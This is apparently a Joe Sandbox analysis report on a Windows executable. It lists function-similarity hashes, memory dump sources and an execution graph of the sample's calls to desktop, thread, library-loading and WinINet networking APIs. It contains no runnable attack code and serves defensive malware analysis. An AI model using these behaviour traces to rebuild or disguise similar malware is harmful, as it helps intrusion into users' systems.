                                                                                                              APIs
                                                                                                              Strings
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000000.00000002.1738022829.0000000000441000.00000020.00000001.01000000.00000003.sdmp, Offset: 00440000, based on PE: true
                                                                                                              • Associated: 00000000.00000002.1737952913.0000000000440000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.1738113479.0000000000470000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.1738134875.000000000047A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.1738134875.000000000049A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.1738172487.000000000049C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_0_2_440000_file.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: _swprintf
                                                                                                              • String ID: %ls$%s: %s
                                                                                                              • API String ID: 589789837-2259941744
                                                                                                              • Opcode ID: 4bfa78e052972454317bf51985e4812f487fb7dc7f440b68bc3c1c72ce219056
                                                                                                              • Instruction ID: 656b9631548c899cbb35f7352022e092b3d5a953157f587a2b19f93a21fcd8ad
                                                                                                              • Opcode Fuzzy Hash: 4bfa78e052972454317bf51985e4812f487fb7dc7f440b68bc3c1c72ce219056
                                                                                                              • Instruction Fuzzy Hash: 3C51A63D58C300FAEA211A948D4BF257655AB05F02F20845BFF86680E7C5DD9C5EAA1F
                                                                                                              APIs
                                                                                                              • __EH_prolog.LIBCMT ref: 0044761E
                                                                                                              • SetFileTime.KERNEL32(?,?,?,?,?,00000005,?,00000011,?,?,00000000,?,0000003A,00000802), ref: 00447799
                                                                                                                • Part of subcall function 0044A0C3: SetFileAttributesW.KERNELBASE(?,00000000,00000001,?,00449EF9,?,?,?,00449D92,?,00000001,00000000,?,?), ref: 0044A0D7
                                                                                                                • Part of subcall function 0044A0C3: SetFileAttributesW.KERNEL32(?,00000000,?,?,00000800,?,00449EF9,?,?,?,00449D92,?,00000001,00000000,?,?), ref: 0044A108
                                                                                                              Strings
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000000.00000002.1738022829.0000000000441000.00000020.00000001.01000000.00000003.sdmp, Offset: 00440000, based on PE: true
                                                                                                              • Associated: 00000000.00000002.1737952913.0000000000440000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.1738113479.0000000000470000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.1738134875.000000000047A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.1738134875.000000000049A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.1738172487.000000000049C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_0_2_440000_file.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: File$Attributes$H_prologTime
                                                                                                              • String ID: :
                                                                                                              • API String ID: 1861295151-336475711
                                                                                                              • Opcode ID: e052b36f404434917a7a1f019c8323b0b02acc8e8f7848a1b5366850bf2e11b9
                                                                                                              • Instruction ID: af3804022915f9aa94847b023023c5bc2337c3ef662851117de446228a675b4f
                                                                                                              • Opcode Fuzzy Hash: e052b36f404434917a7a1f019c8323b0b02acc8e8f7848a1b5366850bf2e11b9
                                                                                                              • Instruction Fuzzy Hash: 2F41B271805258AAFB24EB61DC45EEF777CAF44304F4040AFB545A2182DB386F8ACB69
                                                                                                              Strings
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000000.00000002.1738022829.0000000000441000.00000020.00000001.01000000.00000003.sdmp, Offset: 00440000, based on PE: true
                                                                                                              • Associated: 00000000.00000002.1737952913.0000000000440000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.1738113479.0000000000470000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.1738134875.000000000047A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.1738134875.000000000049A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.1738172487.000000000049C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_0_2_440000_file.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID: UNC$\\?\
                                                                                                              • API String ID: 0-253988292
                                                                                                              • Opcode ID: 55edb2c065bab4fd0193385b116ce3d45661a3293e10bdcf50f8b773932efc02
                                                                                                              • Instruction ID: bcc066fc9ddb49e0ed875d3ed94726feb57f145624b2ae24166302a698a9e346
                                                                                                              • Opcode Fuzzy Hash: 55edb2c065bab4fd0193385b116ce3d45661a3293e10bdcf50f8b773932efc02
                                                                                                              • Instruction Fuzzy Hash: 54417F31400219BBEB21AF23DC41AEF7769EF05358B10856BFC5896242E778D9958AE8
                                                                                                              APIs
                                                                                                              Strings
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000000.00000002.1738022829.0000000000441000.00000020.00000001.01000000.00000003.sdmp, Offset: 00440000, based on PE: true
                                                                                                              • Associated: 00000000.00000002.1737952913.0000000000440000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.1738113479.0000000000470000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.1738134875.000000000047A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.1738134875.000000000049A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.1738172487.000000000049C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_0_2_440000_file.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID: Shell.Explorer$about:blank
                                                                                                              • API String ID: 0-874089819
                                                                                                              • Opcode ID: ee0017250dc12e56907105a49d911b363260b948b13020d7a3fbdc076a2ddfa2
                                                                                                              • Instruction ID: c863ba089b0966220fbd624a2ddfbda6d004e3d8dea7a4fe94b645ddcfcf2caf
                                                                                                              • Opcode Fuzzy Hash: ee0017250dc12e56907105a49d911b363260b948b13020d7a3fbdc076a2ddfa2
                                                                                                              • Instruction Fuzzy Hash: 2921B075310606AFD304AF65C890E27B768BF84B16B15C11FF9059B283CF69EC08CBA5
                                                                                                              APIs
                                                                                                                • Part of subcall function 0044DEB5: GetProcAddress.KERNEL32(00000000,CryptProtectMemory), ref: 0044DED4
                                                                                                                • Part of subcall function 0044DEB5: GetProcAddress.KERNEL32(00481E58,CryptUnprotectMemory), ref: 0044DEE4
                                                                                                              • GetCurrentProcessId.KERNEL32(?,?,?,0044DF2E), ref: 0044DFB5
                                                                                                              Strings
                                                                                                              • CryptProtectMemory failed, xrefs: 0044DF75
                                                                                                              • CryptUnprotectMemory failed, xrefs: 0044DFAD
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000000.00000002.1738022829.0000000000441000.00000020.00000001.01000000.00000003.sdmp, Offset: 00440000, based on PE: true
                                                                                                              • Associated: 00000000.00000002.1737952913.0000000000440000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.1738113479.0000000000470000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.1738134875.000000000047A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.1738134875.000000000049A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.1738172487.000000000049C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_0_2_440000_file.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: AddressProc$CurrentProcess
                                                                                                              • String ID: CryptProtectMemory failed$CryptUnprotectMemory failed
                                                                                                              • API String ID: 2190909847-396321323
                                                                                                              • Opcode ID: 35cabba4d4ad6eb4a8cf2968d0f370ccc43bcb062eab962a12adadfdaf78babb
                                                                                                              • Instruction ID: 72d581c42a515f76be2edc6c0592034fae40b3ad173b0bfbc94dc08145d7c5db
                                                                                                              • Opcode Fuzzy Hash: 35cabba4d4ad6eb4a8cf2968d0f370ccc43bcb062eab962a12adadfdaf78babb
                                                                                                              • Instruction Fuzzy Hash: 22112B71B092165BFB219B29DC01A7F7399AF95B14B04802FF807DA291DB6CEC05839D
                                                                                                              APIs
                                                                                                                • Part of subcall function 0044CED7: GetWindowRect.USER32(?,?), ref: 0044CF0E
                                                                                                                • Part of subcall function 0044CED7: GetClientRect.USER32(?,?), ref: 0044CF1A
                                                                                                                • Part of subcall function 0044CED7: GetWindowLongW.USER32(?,000000F0), ref: 0044CFBB
                                                                                                                • Part of subcall function 0044CED7: GetWindowRect.USER32(?,?), ref: 0044CFE8
                                                                                                                • Part of subcall function 0044CED7: GetWindowTextW.USER32(?,?,00000400), ref: 0044D007
                                                                                                              • GetDlgItem.USER32(00000000,00003021), ref: 0044132B
                                                                                                              • SetWindowTextW.USER32(00000000,004702E4), ref: 00441341
                                                                                                              Strings
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000000.00000002.1738022829.0000000000441000.00000020.00000001.01000000.00000003.sdmp, Offset: 00440000, based on PE: true
                                                                                                              • Associated: 00000000.00000002.1737952913.0000000000440000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.1738113479.0000000000470000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.1738134875.000000000047A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.1738134875.000000000049A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.1738172487.000000000049C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_0_2_440000_file.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: Window$Rect$Text$ClientItemLong
                                                                                                              • String ID: 0
                                                                                                              • API String ID: 660763476-4108050209
                                                                                                              • Opcode ID: d748e62b15f0e9339bd545256385b282fafb766afef89eeaabc0ba02fdc79959
                                                                                                              • Instruction ID: 15f99bb516c17712083be5f11584985e562b910df337e650a3aeeb2268e800f3
                                                                                                              • Opcode Fuzzy Hash: d748e62b15f0e9339bd545256385b282fafb766afef89eeaabc0ba02fdc79959
                                                                                                              • Instruction Fuzzy Hash: 0AF0A4B1540248ABFF150F608C09AEA3B5A9B04789F08801AFE49546B1C77CD8D0DB1C
                                                                                                              APIs
                                                                                                              • WaitForSingleObject.KERNEL32(?,000000FF,0044FD0B,?,?,0044FD80,?,?,?,?,?,0044FD6A), ref: 0044FACD
                                                                                                              • GetLastError.KERNEL32(?,?,0044FD80,?,?,?,?,?,0044FD6A), ref: 0044FAD9
                                                                                                                • Part of subcall function 00446DD3: __vswprintf_c_l.LEGACY_STDIO_DEFINITIONS ref: 00446DF1
                                                                                                              Strings
                                                                                                              • WaitForMultipleObjects error %d, GetLastError %d, xrefs: 0044FAE2
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000000.00000002.1738022829.0000000000441000.00000020.00000001.01000000.00000003.sdmp, Offset: 00440000, based on PE: true
                                                                                                              • Associated: 00000000.00000002.1737952913.0000000000440000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.1738113479.0000000000470000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.1738134875.000000000047A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.1738134875.000000000049A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.1738172487.000000000049C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_0_2_440000_file.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: ErrorLastObjectSingleWait__vswprintf_c_l
                                                                                                              • String ID: WaitForMultipleObjects error %d, GetLastError %d
                                                                                                              • API String ID: 1091760877-2248577382
                                                                                                              • Opcode ID: 6bfcf8210504364822495d7da65828ddd87b2cefc6cc369d2feecee66df0a03c
                                                                                                              • Instruction ID: d1927758841a8a2d4f72d08fbbd2cbdc31daa464af527f010b379765ef62cd86
                                                                                                              • Opcode Fuzzy Hash: 6bfcf8210504364822495d7da65828ddd87b2cefc6cc369d2feecee66df0a03c
                                                                                                              • Instruction Fuzzy Hash: 28D05B71909431A7E50133346C06EAF3904AB13734F25472BF13DA51E5CB580C91429E

                                                                                                              Execution Graph

                                                                                                              Execution Coverage:6%
                                                                                                              Dynamic/Decrypted Code Coverage:0%
                                                                                                              Signature Coverage:15.1%
                                                                                                              Total number of Nodes:2000
                                                                                                              Total number of Limit Nodes:114
                                                                                                              execution_graph 75926 11108d30 75969 1110f420 75926->75969 75929 11108da9 OpenEventA 75932 11108ed1 GetStockObject GetObjectA InitializeCriticalSection InitializeCriticalSection 75929->75932 75933 11108e18 CloseHandle GetSystemDirectoryA 75929->75933 75934 1110f420 std::locale::_Init 265 API calls 75932->75934 75935 11108e38 75933->75935 75936 11108f23 75934->75936 75935->75935 75937 11108e40 LoadLibraryA 75935->75937 75938 11108f3c 75936->75938 76046 110f4680 268 API calls std::locale::_Init 75936->76046 75937->75932 75939 11108e71 75937->75939 75997 1110f2b0 75938->75997 76013 111450a0 75939->76013 75943 11108e7b 75945 11108e82 GetProcAddress 75943->75945 75946 11108e9a GetProcAddress 75943->75946 75945->75946 75948 11108ec4 FreeLibrary 75946->75948 75949 11108eb6 75946->75949 75948->75932 75949->75932 75951 11109005 76049 11161d01 75951->76049 75953 1110f420 std::locale::_Init 265 API calls 75955 11108f73 75953->75955 75954 1110901f 75956 11108f84 75955->75956 75957 11108f8d 75955->75957 76047 110f4680 268 API calls std::locale::_Init 75956->76047 75959 1110f2b0 424 API calls 75957->75959 75960 11108fa9 CloseHandle 75959->75960 75961 111450a0 std::locale::_Init 90 API calls 75960->75961 75962 11108fba 75961->75962 75962->75951 75963 1110f420 std::locale::_Init 265 API calls 75962->75963 75964 11108fc8 75963->75964 75967 11108fe2 75964->75967 76048 110f4680 268 API calls std::locale::_Init 75964->76048 75966 1110f2b0 424 API calls 75968 11108ffe CloseHandle 75966->75968 75967->75966 75968->75951 76057 11162b51 75969->76057 75972 1110f473 _memset 75976 11161d01 __ehhandler$?_StructuredChoreWrapper@_UnrealizedChore@details@Concurrency@@CAXPAV123@@Z 5 API calls 75972->75976 75973 1110f447 wsprintfA 76074 11029450 265 API calls 2 library calls 75973->76074 75977 11108d91 75976->75977 75977->75929 75978 11107290 75977->75978 76083 1110f520 75978->76083 75981 1110f520 3 API calls 75982 111072dc 75981->75982 75983 1110f520 3 API calls 75982->75983 75984 111072ee 75983->75984 75985 1110f520 3 API calls 75984->75985 75986 111072ff 75985->75986 75987 1110f520 3 API calls 75986->75987 75988 11107310 75987->75988 75989 1110f420 std::locale::_Init 265 API calls 75988->75989 75990 11107321 75989->75990 75991 1110740a 75990->75991 75992 1110732c LoadLibraryA LoadLibraryA 75990->75992 76090 1116219a 66 API calls std::exception::_Copy_str 75991->76090 75992->75929 75994 11107419 76091 111625f1 RaiseException 75994->76091 75996 1110742e 75998 1110f2d0 CreateThread 75997->75998 75999 1110f2bf CreateEventA 75997->75999 76001 1110f2f6 75998->76001 76002 1110f30d 75998->76002 76095 11102c50 75998->76095 76117 1110fde0 75998->76117 76131 11027270 75998->76131 76156 1102c410 75998->76156 75999->75998 76094 11029450 265 API calls 2 library calls 76001->76094 76004 1110f311 WaitForSingleObject CloseHandle 76002->76004 76005 11108f58 CloseHandle 76002->76005 76004->76005 76007 1109e9e0 76005->76007 76008 1109e9ef GetCurrentProcess OpenProcessToken 76007->76008 76009 1109ea2d 76007->76009 76008->76009 76010 1109ea12 76008->76010 76009->75951 76009->75953 76548 1109e910 76010->76548 76012 1109ea1b CloseHandle 76012->76009 76014 111450c1 GetVersionExA 76013->76014 76015 1114529c 76013->76015 76014->76015 76017 111450e3 76014->76017 76016 111452a5 76015->76016 76021 11145304 76015->76021 76572 11081c60 76015->76572 76018 11161d01 __ehhandler$?_StructuredChoreWrapper@_UnrealizedChore@details@Concurrency@@CAXPAV123@@Z 5 API calls 76016->76018 76017->76015 76019 111450f0 RegOpenKeyExA 76017->76019 76020 111452b2 76018->76020 76019->76015 76023 1114511d _memset 76019->76023 76020->75943 76022 11161d01 __ehhandler$?_StructuredChoreWrapper@_UnrealizedChore@details@Concurrency@@CAXPAV123@@Z 5 API calls 76021->76022 76024 11145314 76022->76024 76561 11143000 RegQueryValueExA 76023->76561 76024->75943 76028 11143000 std::locale::_Init RegQueryValueExA 76030 11145189 76028->76030 76029 111452ec 76029->76016 76032 11162de7 std::locale::_Init 79 API calls 76029->76032 76031 1114528f RegCloseKey 76030->76031 76563 11162de7 76030->76563 76031->76015 76034 111452fd 76032->76034 76034->76016 76034->76021 76037 111451ad 76038 111451c6 76037->76038 76039 11163a2d std::locale::_Init 79 API calls 76037->76039 76040 11162de7 std::locale::_Init 79 API calls 76038->76040 76039->76037 76042 111451d2 _strncpy 76040->76042 76041 11145271 76041->76031 76042->76041 76043 11143000 std::locale::_Init RegQueryValueExA 76042->76043 76044 11145248 76043->76044 76045 11143000 std::locale::_Init RegQueryValueExA 76044->76045 76045->76041 76046->75938 76047->75957 76048->75967 76050 11161d0b IsDebuggerPresent 76049->76050 76051 11161d09 76049->76051 76720 11177637 76050->76720 76051->75954 76054 1116bc99 SetUnhandledExceptionFilter UnhandledExceptionFilter 76055 1116bcbe GetCurrentProcess TerminateProcess 76054->76055 76056 1116bcb6 __call_reportfault 76054->76056 76055->75954 76056->76055 76058 11162bce 76057->76058 76071 11162b5f 76057->76071 76081 1116d4a8 DecodePointer 76058->76081 76060 11162b6a 76060->76071 76075 1116d99d 66 API calls 2 library calls 76060->76075 76076 1116d7ee 66 API calls 7 library calls 76060->76076 76077 1116d52d GetModuleHandleW GetProcAddress ExitProcess ___crtCorExitProcess 76060->76077 76061 11162bd4 76082 111692ef 66 API calls __getptd_noexit 76061->76082 76064 11162b8d RtlAllocateHeap 76065 1110f43e 76064->76065 76064->76071 76065->75972 76065->75973 76067 11162bba 76079 111692ef 66 API calls __getptd_noexit 76067->76079 76071->76060 76071->76064 76071->76067 76072 11162bb8 76071->76072 76078 1116d4a8 DecodePointer 76071->76078 76080 111692ef 66 API calls __getptd_noexit 76072->76080 76075->76060 76076->76060 76078->76071 76079->76072 76080->76065 76081->76061 76082->76065 76084 1110f536 CreateEventA 76083->76084 76085 1110f549 76083->76085 76084->76085 76087 1110f557 76085->76087 76092 1110f260 InterlockedIncrement 76085->76092 76088 111072cc 76087->76088 76093 1110f3c0 InterlockedIncrement 76087->76093 76088->75981 76090->75994 76091->75996 76092->76087 76093->76088 76191 11089280 76095->76191 76097 11102c5d 76098 11102c69 GetCurrentThreadId GetThreadDesktop OpenDesktopA 76097->76098 76099 11102ccf GetLastError 76098->76099 76100 11102c8f SetThreadDesktop 76098->76100 76103 11146450 std::locale::_Init 21 API calls 76099->76103 76101 11102cb1 GetLastError 76100->76101 76102 11102c9a 76100->76102 76105 11146450 std::locale::_Init 21 API calls 76101->76105 76202 11146450 76102->76202 76106 11102ce1 76103->76106 76108 11102cc3 CloseDesktop 76105->76108 76196 11102bd0 76106->76196 76108->76106 76110 11102ceb 76208 1110f340 76110->76208 76112 11102cf2 76213 110f4740 16 API calls 76112->76213 76114 11102cf9 76214 1110f370 SetEvent PulseEvent 76114->76214 76116 11102d00 std::ios_base::_Tidy 76267 110b7a20 76117->76267 76119 1110fdee GetCurrentThreadId 76120 1110f340 266 API calls 76119->76120 76126 1110fe09 std::ios_base::_Tidy 76120->76126 76121 1110fe80 76271 1110f370 SetEvent PulseEvent 76121->76271 76122 1110fe20 WaitForSingleObject 76269 1110fc10 EnterCriticalSection LeaveCriticalSection LeaveCriticalSection std::ios_base::_Tidy 76122->76269 76124 1110fe8a 76126->76121 76126->76122 76127 1110fe43 76126->76127 76270 1110fc10 EnterCriticalSection LeaveCriticalSection LeaveCriticalSection std::ios_base::_Tidy 76126->76270 76128 1110fe53 PostMessageA 76127->76128 76129 1110fe58 PostThreadMessageA 76127->76129 76128->76126 76129->76126 76132 110272a2 76131->76132 76133 11089280 5 API calls 76132->76133 76134 110272a9 CreateEventA 76133->76134 76135 1110f420 std::locale::_Init 265 API calls 76134->76135 76136 110272c6 76135->76136 76137 110272e7 76136->76137 76272 111100d0 76136->76272 76139 1110f340 266 API calls 76137->76139 76152 110272ff 76139->76152 76140 11027316 WaitForMultipleObjects 76141 1102732d 76140->76141 76140->76152 76142 11027336 PostMessageA 76141->76142 76143 1102734a SetEvent Sleep 76141->76143 76142->76143 76142->76152 76143->76152 76144 110273f4 76145 1102740e CloseHandle 76144->76145 76301 1110fc70 278 API calls 2 library calls 76144->76301 76302 1110f370 SetEvent PulseEvent 76145->76302 76146 11027375 PostMessageA 76146->76152 76149 11027423 76151 11027405 std::ios_base::_Tidy 76151->76145 76152->76140 76152->76144 76152->76146 76153 110273ba GetCurrentThreadId GetThreadDesktop 76152->76153 76300 11027250 EnterCriticalSection LeaveCriticalSection LeaveCriticalSection 76152->76300 76153->76152 76154 110273c9 SetThreadDesktop 76153->76154 76154->76152 76155 110273d4 CloseDesktop 76154->76155 76155->76152 76157 1102c442 76156->76157 76158 1110f340 266 API calls 76157->76158 76159 1102c44f WaitForSingleObject 76158->76159 76160 1102c466 76159->76160 76161 1102c67d 76159->76161 76162 1102c470 GetTickCount 76160->76162 76163 1102c666 WaitForSingleObject 76160->76163 76400 1110f370 SetEvent PulseEvent 76161->76400 76306 110d1550 76162->76306 76163->76160 76163->76161 76166 1102c684 CloseHandle 76401 1110f580 InterlockedDecrement SetEvent PulseEvent InterlockedDecrement CloseHandle 76166->76401 76168 1102c695 std::ios_base::_Tidy 76169 110d1550 268 API calls 76180 1102c486 76169->76180 76171 1102c6b4 76402 11029450 265 API calls 2 library calls 76171->76402 76173 1102c6c8 76403 11029450 265 API calls 2 library calls 76173->76403 76175 1102c6dc 76404 11029450 265 API calls 2 library calls 76175->76404 76178 1102c6f0 76405 11029450 265 API calls 2 library calls 76178->76405 76179 1102c574 GetTickCount 76190 1102c571 std::ios_base::_Tidy 76179->76190 76180->76169 76180->76171 76180->76173 76180->76175 76180->76179 76316 110d0710 76180->76316 76328 11029590 LoadLibraryA 76180->76328 76380 110d1370 269 API calls 2 library calls 76180->76380 76184 11146450 std::locale::_Init 21 API calls 76184->76190 76185 110d07c0 265 API calls 76185->76190 76188 110679c0 298 API calls 76188->76190 76190->76171 76190->76173 76190->76178 76190->76179 76190->76184 76190->76185 76190->76188 76381 11142290 76190->76381 76390 11042530 267 API calls 2 library calls 76190->76390 76391 110d07c0 76190->76391 76215 1110f6c0 76191->76215 76193 11089290 76194 110892b3 76193->76194 76195 110892a2 UnhookWindowsHookEx 76193->76195 76194->76097 76195->76194 76197 1110f420 std::locale::_Init 265 API calls 76196->76197 76198 11102bfd 76197->76198 76199 11102c30 76198->76199 76221 11102ab0 76198->76221 76199->76110 76201 11102c1d 76201->76110 76203 11146461 76202->76203 76204 1114645c 76202->76204 76241 111458f0 76203->76241 76244 111456a0 18 API calls std::locale::_Init 76204->76244 76209 1110f360 SetEvent 76208->76209 76210 1110f349 76208->76210 76209->76112 76266 11029450 265 API calls 2 library calls 76210->76266 76213->76114 76214->76116 76216 1110f6d7 EnterCriticalSection 76215->76216 76217 1110f6ce GetCurrentThreadId 76215->76217 76218 1110f6ee ___DllMainCRTStartup 76216->76218 76217->76216 76219 1110f6f5 LeaveCriticalSection 76218->76219 76220 1110f708 LeaveCriticalSection 76218->76220 76219->76193 76220->76193 76228 1115f550 76221->76228 76224 11102b81 CreateWindowExA 76224->76201 76225 11102b17 std::locale::_Init 76226 11102b50 GetStockObject RegisterClassA 76225->76226 76226->76224 76227 11102b7a 76226->76227 76227->76224 76231 1115e380 GlobalAddAtomA 76228->76231 76232 1115e3b5 GetLastError wsprintfA 76231->76232 76233 1115e407 GlobalAddAtomA GlobalAddAtomA 76231->76233 76240 11029450 265 API calls 2 library calls 76232->76240 76235 11161d01 __ehhandler$?_StructuredChoreWrapper@_UnrealizedChore@details@Concurrency@@CAXPAV123@@Z 5 API calls 76233->76235 76237 11102ae1 GlobalAddAtomA 76235->76237 76237->76224 76237->76225 76245 111457a0 76241->76245 76243 11102ca5 CloseDesktop 76243->76106 76244->76203 76246 111457c4 76245->76246 76247 111457c9 76245->76247 76265 111456a0 18 API calls std::locale::_Init 76246->76265 76249 11145832 76247->76249 76250 111457d2 76247->76250 76251 111458de 76249->76251 76252 1114583f wsprintfA 76249->76252 76253 11145809 76250->76253 76256 111457e0 76250->76256 76254 11161d01 __ehhandler$?_StructuredChoreWrapper@_UnrealizedChore@details@Concurrency@@CAXPAV123@@Z 5 API calls 76251->76254 76255 11145862 76252->76255 76259 11161d01 __ehhandler$?_StructuredChoreWrapper@_UnrealizedChore@details@Concurrency@@CAXPAV123@@Z 5 API calls 76253->76259 76257 111458ea 76254->76257 76255->76255 76258 11145869 wvsprintfA 76255->76258 76261 11161d01 __ehhandler$?_StructuredChoreWrapper@_UnrealizedChore@details@Concurrency@@CAXPAV123@@Z 5 API calls 76256->76261 76257->76243 76264 11145884 76258->76264 76260 1114582e 76259->76260 76260->76243 76262 11145805 76261->76262 76262->76243 76263 111458d1 OutputDebugStringA 76263->76251 76264->76263 76264->76264 76265->76247 76268 110b7a28 std::locale::_Init 76267->76268 76268->76119 76269->76126 76270->76126 76271->76124 76273 1110f420 std::locale::_Init 265 API calls 76272->76273 76274 11110101 76273->76274 76275 11110123 GetCurrentThreadId InitializeCriticalSection 76274->76275 76277 1110f420 std::locale::_Init 265 API calls 76274->76277 76279 11110190 EnterCriticalSection 76275->76279 76280 11110183 InitializeCriticalSection 76275->76280 76278 1111011c 76277->76278 76278->76275 76303 1116219a 66 API calls std::exception::_Copy_str 76278->76303 76281 1111024a LeaveCriticalSection 76279->76281 76282 111101be CreateEventA 76279->76282 76280->76279 76281->76137 76284 111101d1 76282->76284 76285 111101e8 76282->76285 76305 11029450 265 API calls 2 library calls 76284->76305 76288 1110f420 std::locale::_Init 265 API calls 76285->76288 76286 1111013f 76304 111625f1 RaiseException 76286->76304 76289 111101ef 76288->76289 76292 1111020c 76289->76292 76293 111100d0 418 API calls 76289->76293 76294 1110f420 std::locale::_Init 265 API calls 76292->76294 76293->76292 76295 1111021c 76294->76295 76296 1111022d 76295->76296 76297 1110f520 3 API calls 76295->76297 76298 1110f2b0 418 API calls 76296->76298 76297->76296 76299 11110245 76298->76299 76299->76281 76300->76152 76301->76151 76302->76149 76303->76286 76304->76275 76406 110d1480 76306->76406 76309 110d159b 76312 110d15b5 76309->76312 76313 110d1598 76309->76313 76310 110d1584 76420 11029450 265 API calls 2 library calls 76310->76420 76312->76180 76313->76309 76421 11029450 265 API calls 2 library calls 76313->76421 76317 110d0724 76316->76317 76479 11163cf8 76317->76479 76320 110d0450 265 API calls 76321 110d0753 76320->76321 76487 110cfe70 76321->76487 76324 110d077c 76324->76180 76325 110d0765 76499 11029450 265 API calls 2 library calls 76325->76499 76373 11029621 std::ios_base::_Tidy 76328->76373 76329 11029653 GetProcAddress 76330 11029671 SetLastError 76329->76330 76329->76373 76330->76373 76331 11029748 InternetOpenA 76331->76373 76332 1102972f GetProcAddress 76332->76331 76333 11029779 SetLastError 76332->76333 76333->76373 76334 11162be5 66 API calls _free 76334->76373 76335 110296a5 GetProcAddress 76336 11029762 SetLastError 76335->76336 76335->76373 76337 110296d2 GetLastError 76336->76337 76337->76373 76338 11142290 std::locale::_Init 265 API calls 76338->76373 76339 110296f5 GetProcAddress 76340 1102976f SetLastError 76339->76340 76339->76373 76340->76373 76341 11162b51 66 API calls _malloc 76341->76373 76342 11029a40 76345 11029b76 GetProcAddress 76342->76345 76346 11029a31 76342->76346 76343 11029bb0 76343->76190 76344 11029ba9 FreeLibrary 76344->76343 76345->76346 76349 11029b97 SetLastError 76345->76349 76346->76343 76346->76344 76347 11029a57 GetProcAddress 76348 11029b2e SetLastError 76347->76348 76350 11029a1a std::ios_base::_Tidy 76347->76350 76369 11029b36 std::ios_base::_Tidy 76348->76369 76349->76346 76350->76342 76350->76346 76350->76347 76368 11029a88 std::ios_base::_Tidy 76350->76368 76350->76369 76351 11081a70 IsDBCSLeadByte 76351->76373 76354 11029b5b 76533 110278a0 GetProcAddress SetLastError 76354->76533 76356 110297ff GetProcAddress 76360 1102981c SetLastError 76356->76360 76356->76373 76357 1102982b GetProcAddress 76358 1102983e InternetConnectA 76357->76358 76362 11029881 SetLastError 76357->76362 76358->76373 76359 11029b6a 76359->76342 76360->76373 76362->76373 76363 110298a3 GetProcAddress 76365 110298d6 SetLastError 76363->76365 76363->76373 76364 11029864 GetProcAddress 76366 11029891 SetLastError 76364->76366 76364->76373 76365->76373 76366->76373 76367 110d1090 268 API calls 76367->76368 76368->76350 76368->76367 76368->76369 76524 1110f4a0 76368->76524 76531 11027850 GetProcAddress SetLastError 76368->76531 76532 110278a0 GetProcAddress SetLastError 76369->76532 76370 110298f1 